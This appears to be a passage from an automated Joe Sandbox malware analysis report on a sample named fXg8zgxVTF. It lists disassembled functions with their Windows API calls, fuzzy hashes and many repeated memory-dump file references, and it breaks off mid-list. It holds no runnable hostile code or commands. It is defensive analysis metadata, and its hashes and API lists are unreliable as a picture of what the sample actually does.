Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 155bc5c5ab640c8aa1b2e39562f279ff9899f4b69e6700d2667b4afaf6e4df42
Instruction ID: 022d934459d3cae6f7dd5432f10d91f05b6d3b1f598d9991f14dad042366c8c8
Opcode Fuzzy Hash: 155bc5c5ab640c8aa1b2e39562f279ff9899f4b69e6700d2667b4afaf6e4df42
Instruction Fuzzy Hash: C0F01D35504108EBCF015FA3CC089AA3BACBB04344B04887AFD15A51E0EB78DA729B5A

Function 00443540 Relevance: 3.2, APIs: 2, Instructions: 190COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0044359A

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Cursor
String ID:
API String ID: 3268636600-0
Opcode ID: aaf9c61f087dafacd0b9661604b5e0ef886d7c12f02459ff1b85f09bef3d1a8a
Instruction ID: 1a337434b0981f10d33952fa802190e797b6102c96a84dceb654d2a1e93e7684
Opcode Fuzzy Hash: aaf9c61f087dafacd0b9661604b5e0ef886d7c12f02459ff1b85f09bef3d1a8a
Instruction Fuzzy Hash: 9F81E775A001089FDB08DF94C991EEEB7B6BF88304F14826AE506BB395D7386E45CB58

Function 00444310 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 0040855C: _malloc.LIBCMT ref: 0040857A

FindResourceW.KERNEL32(00000000,00000000,00000002), ref: 00444391
LoadResource.KERNEL32(00000000,00000000), ref: 0044439A

Part of subcall function 00443C10: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00443C52

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ProcessorResourceVirtual$Concurrency::FindLoadRootRoot::_malloc
String ID:
API String ID: 598088937-0
Opcode ID: 7e126ccb9dc30fe33ff9e210a89977a663e41e127a0d29fa7075c8eab23266c3
Instruction ID: a86092c6bc1107f9a92952de1df7c68d7383c259c2b8befdc69973cfd645ab01
Opcode Fuzzy Hash: 7e126ccb9dc30fe33ff9e210a89977a663e41e127a0d29fa7075c8eab23266c3
Instruction Fuzzy Hash: C23119B5A002099FDB04DF98C841BAEBBF5FB88714F10811AF915A7390D774AD40CBA5

Function 0043EEB0 Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000825), ref: 0043EEDE
FindClose.KERNEL32(000000FF), ref: 0043EEFE

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 990dc49d28c54b75186b8abe257bc0d626a42160b26b0296e1c5868fe41e7db6
Instruction ID: 3529e93fa89651394dab5ba878feac018e190e8f9904f86d4eb3892f5fb0ad5b
Opcode Fuzzy Hash: 990dc49d28c54b75186b8abe257bc0d626a42160b26b0296e1c5868fe41e7db6
Instruction Fuzzy Hash: CDF0907090121CDFC710DF65DC4C69AB7B4EB48311F1042AEE90997380EA759E80DF59

Function 0040E09D Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040E0C0
GetVersionExA.KERNEL32(?), ref: 0040E0D9

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Version_memset
String ID:
API String ID: 963298953-0
Opcode ID: 89841f6f4e86abb305b6b61f5e175f99ae43042c96f2580655610c1fc5f7779c
Instruction ID: 300631509c3b2e954051aa4ba93928a1d84dcf10ade774c8844959bd37eb341c
Opcode Fuzzy Hash: 89841f6f4e86abb305b6b61f5e175f99ae43042c96f2580655610c1fc5f7779c
Instruction Fuzzy Hash: 9EF06575A002189FDB50EB71DD46B4E77F8AB04308F9144E9950DD6282EE74AA48CB55

Function 004125F4 Relevance: 2.0, APIs: 1, Instructions: 452COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004125FB

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 96b0bb921f950d271ce7d3c2568b610c92645398c538aeb18277148384c9ce05
Instruction ID: a28980bad3667be5116b2d1fc0a508c8c2b3b8f2c18311dcb0786cbd12989a95
Opcode Fuzzy Hash: 96b0bb921f950d271ce7d3c2568b610c92645398c538aeb18277148384c9ce05
Instruction Fuzzy Hash: E8F19070604219EFDB14DF15C980AFF77A9FF04314F10812AF819EA292D7B8D9A1DB69

Function 0044EDE0 Relevance: 1.8, APIs: 1, Instructions: 279COMMON

Download Yara Rule

APIs

Part of subcall function 004136CF: GetWindowLongW.USER32(?,000000F0), ref: 004136DA

MoveWindow.USER32(00000000,?,?,?,?,00000001), ref: 0044F0D0

Part of subcall function 00401710: GetWindowRect.USER32(?,?), ref: 00401722

Part of subcall function 004137BD: MoveWindow.USER32(?,?,?,?,?,?), ref: 004137DA

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Window$Move$LongRect
String ID:
API String ID: 4244027617-0
Opcode ID: 7609eb214ad4ed93a39d0ba4fbbac6de49170185a84418f618ee7e53f734d1e9
Instruction ID: 1de92d5964cecd9394a3662d8c6f3ac8a2bb115732be4857f3ff6dac8d38239a
Opcode Fuzzy Hash: 7609eb214ad4ed93a39d0ba4fbbac6de49170185a84418f618ee7e53f734d1e9
Instruction Fuzzy Hash: 46D1CC75A0010A9FDB08DF9DC594EFEF3B5BF88304F14826DE919A7385CA39A942CB54

Function 0041863E Relevance: 1.6, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

3)&, xrefs: 0041886D

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
